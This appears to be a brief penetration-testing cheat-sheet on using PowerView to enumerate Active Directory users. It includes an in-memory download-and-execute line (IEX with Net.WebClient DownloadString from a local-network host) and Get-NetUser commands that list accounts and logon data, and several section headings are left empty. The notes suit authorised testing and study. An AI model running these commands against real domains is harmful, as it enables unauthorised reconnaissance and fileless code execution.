PowerView

If you have access to an AD client, with user in the Domain.

Import the PowerView into memory.

PS> Import-Module .\PowerView.ps1

Directly in to memory from web service

IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

User Enumeration

PS> Get-NetUser

PS> Get-NetUser | select samaccountname, lastlogon

# interesting things
logoncount
samaccountname
lastlogon

Group Enumeration

Computer Enumeration

ACL Enumeration

Last updated